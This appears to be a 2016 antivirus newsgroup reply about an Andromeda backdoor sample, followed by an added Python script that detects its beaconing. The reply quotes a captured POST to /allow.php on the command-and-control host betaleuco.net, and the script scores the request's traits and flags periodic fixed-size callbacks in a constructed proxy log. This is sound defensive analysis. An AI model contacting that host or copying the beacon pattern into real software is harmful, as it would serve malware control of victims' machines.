echo: alt-comp-anti-virus
to: ALL
from: DAVID H. LIPMAN
date: 2016-04-09 22:37:00
subject: Re: Just got a new viral-

On 4/9/2016 1:23 PM, Virus Guy wrote:
> "David H. Lipman" wrote:
>
>> On 4/7/2016 9:22 AM, Virus Guy wrote:
>>> This came in almost 3 hours ago:
>>
>> There is a big difference between Sality and an Andromeda backdoor
>> bot.  If it were truly Sality, all anti-virus vendors would have
>> that detection.
>
> I did upload it to uploadmalware - so you should have access to it.
>
> malwr.com analysis shows HTTP traffic, but they seem to be POSTs, not
> GETs.  So it wasn't clear to me if there were any visible or operable
> payload URLs to be had.
>

As a backdoor, it has to beacon from the compromised system and/or phone home.

POST /allow.php HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 42
Host: betaleuco.net
-- 
Dave
Multi-AV Scanning Tool - http://multi-av.thespykiller.co.uk
http://www.pctipp.ch/downloads/dl/35905.asp
--- NewsGate v1.0 gamma 2
* Origin: News Gate @ Net396 -Huntsville, AL - USA (1:396/4)

SOURCE: echomail via QWK@docsplace.org
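The request Dave pasted is a single beacon; what makes a backdoor's phone-home stand out in proxy or firewall logs is the repetition: the same client POSTing a body of the same size to the same host and path on a near-fixed timer. The following is an added example (not code from the thread or from any of the tools mentioned in it) that does two things: it parses a raw request header block like the one above and lists the beacon-like traits in it, and it scans a constructed proxy log for periodic, fixed-size callbacks. Only the host betaleuco.net and the path /allow.php come from the post; the log format, the timestamps, the client address and the benign traffic mixed in are all constructed for illustration, and the thresholds (four hits, 15% timing jitter) are assumptions to tune per environment.

```python
"""Beacon indicators and periodicity detection over constructed log data.

Added example, not part of the original post. Host/path are taken from the
request quoted in the thread; the proxy log format below is assumed
(space-separated: time client method host path content-type bytes user-agent).
"""
from __future__ import annotations

import statistics
from collections import defaultdict
from datetime import datetime

# Header block as quoted in the thread (User-Agent shortened to one line).
CAPTURED_REQUEST = """\
POST /allow.php HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0)
Content-Length: 42
Host: betaleuco.net
"""

# Constructed proxy log: one beaconing client mixed with ordinary browsing.
SAMPLE_LOG = """\
2016-04-09T13:00:02 10.0.0.7 POST betaleuco.net /allow.php application/octet-stream 42 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0)
2016-04-09T13:00:09 10.0.0.7 GET www.example.com /index.html - 0 Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
2016-04-09T13:05:01 10.0.0.7 POST betaleuco.net /allow.php application/octet-stream 42 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0)
2016-04-09T13:07:44 10.0.0.7 GET www.example.com /news.html - 0 Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
2016-04-09T13:10:03 10.0.0.7 POST betaleuco.net /allow.php application/octet-stream 42 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0)
2016-04-09T13:12:30 10.0.0.7 POST www.example.com /search.php application/x-www-form-urlencoded 118 Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
2016-04-09T13:15:00 10.0.0.7 POST betaleuco.net /allow.php application/octet-stream 42 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0)
2016-04-09T13:20:02 10.0.0.7 POST betaleuco.net /allow.php application/octet-stream 42 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0)
2016-04-09T13:31:10 10.0.0.7 POST www.example.com /search.php application/x-www-form-urlencoded 131 Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
2016-04-09T13:47:51 10.0.0.7 POST www.example.com /search.php application/x-www-form-urlencoded 97 Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
"""


def request_indicators(raw: str) -> list[str]:
    """Return the beacon-like traits found in one raw HTTP request header block."""
    lines = [ln for ln in raw.splitlines() if ln.strip()]
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()

    hits: list[str] = []
    if method == "POST" and headers.get("content-type") == "application/octet-stream":
        hits.append("binary POST body")                      # opaque blob, not a form
    if "no-cache" in (headers.get("cache-control", ""), headers.get("pragma", "")):
        hits.append("no-cache directives")                   # must reach the C2 every time
    if "referer" not in headers and "accept" not in headers:
        hits.append("no Referer/Accept")                     # a browser page load sends both
    length = headers.get("content-length", "")
    if path.lower().endswith(".php") and length.isdigit() and int(length) < 256:
        hits.append("small fixed-size body to a script endpoint")
    return hits


def find_beacons(log_text: str, min_hits: int = 4, max_jitter: float = 0.15) -> list[dict]:
    """Group requests by (client, method, host, path); flag groups whose
    inter-arrival times are near-constant and whose body size never changes."""
    groups: dict[tuple, list] = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, method, host, path, _ctype, size, _ua = line.split(maxsplit=7)
        groups[(client, method, host, path)].append((datetime.fromisoformat(ts), int(size)))

    flagged = []
    for (client, method, host, path), events in groups.items():
        if len(events) < min_hits:
            continue
        events.sort()
        times = [t for t, _ in events]
        deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(deltas)
        if mean <= 0:
            continue
        jitter = statistics.pstdev(deltas) / mean          # coefficient of variation
        sizes = {size for _, size in events}
        if jitter <= max_jitter and len(sizes) == 1:
            flagged.append({"client": client, "method": method, "host": host, "path": path,
                            "hits": len(events), "period_s": round(mean), "body_bytes": sizes.pop()})
    return flagged


if __name__ == "__main__":
    print("indicators:", request_indicators(CAPTURED_REQUEST))
    for b in find_beacons(SAMPLE_LOG):
        print(f"beacon: {b['client']} -> {b['host']}{b['path']} every ~{b['period_s']}s, "
              f"{b['hits']} hits of {b['body_bytes']} bytes")
```

One caveat on the User-Agent: `Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; ...)` is exactly what Internet Explorer 11 sends in Compatibility View, so the UA string by itself is not an indicator; the code above deliberately does not score it. The fixed 42-byte body and the constant interval are the stronger signals, and the periodicity check is what separates a bot's timer from a user clicking around on the same site.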